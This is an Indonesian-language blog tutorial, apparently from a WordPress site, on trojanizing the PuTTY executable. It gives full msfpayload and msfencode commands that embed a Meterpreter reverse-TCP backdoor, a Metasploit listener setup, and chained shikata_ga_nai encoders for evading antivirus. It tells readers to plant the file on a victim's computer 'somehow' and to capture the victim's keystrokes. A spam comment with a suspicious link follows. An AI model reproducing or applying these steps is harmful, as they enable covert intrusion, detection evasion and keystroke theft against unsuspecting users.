Membuat backdoor dengan shikata_ga_nai


Membuat backdoor dengan shikata ga nai

1. Cara yang harus dilakukan adalah mendownload sebuah file yang nantinya akan di sisipi backdoor nantinya.
Saya mengambil contoh file putty, karena itu file sangat sering digunakan orang – orang🙂

deprito@WindwetaAyu:~$ wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
Klik gambar untuk memperbesar

2. Infeksi file yang akan dieksekusi dengan payload exploit.
Rubah nama putty.exe manjadi putty_ultimate.exe dan gunakan exploit x86/shikata_ga_nai.

root@WindwetaAyu:/pentest/exploits/framework#  ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.7 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_ultimate.exe -e x86/shikata_ga_nai -c 5
Klik gambar untuk memperbesar

3. Jalankan Metasploit dan buat listener agar ketika file yang kita buat diatas dieksekusi meterpreter akan langsung terbuka.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP_KITA
exploit
Klik gambar untuk memperbesar

4. Entah bagaimana caranya copy file yang sudah diinfeksi diatas kedalam komputer korban,entah bagaimana caranya.
Ketika file dieksekusi maka secara otomatis meterpreter akan terbuka.
Sekarang, tinggal ekspolarasi🙂

Note : Meterpreter akan mati, ketika program itu di close

5. Tambahan :
– Gunakan perintah keyscan_start dan untuk melihat hasil ketikan dari korban gunakan keyscan_dump.
– Pada tahap ke-2 apabila backdoor masih terdeteksi oleh Antivirus. Gunakan perintah ini.

root@WindwetaAyu:/pentest/exploits/framework#  ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.7 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c -8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86_jmp_call_additive -c 2 -t exe > /tmp/putty_ultimate.exe

Sekian tutorial dari saya🙂

Raw version : http://tinypaste.com/8f72baed | password : ibteam

2 thoughts on “Membuat backdoor dengan shikata_ga_nai

  1. Hi! my identify is Jully. I would like to meemeet seemly boy🙂
    This is my homepage [url=]http://jskdh5jkd7djh4.com/[/url]l

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s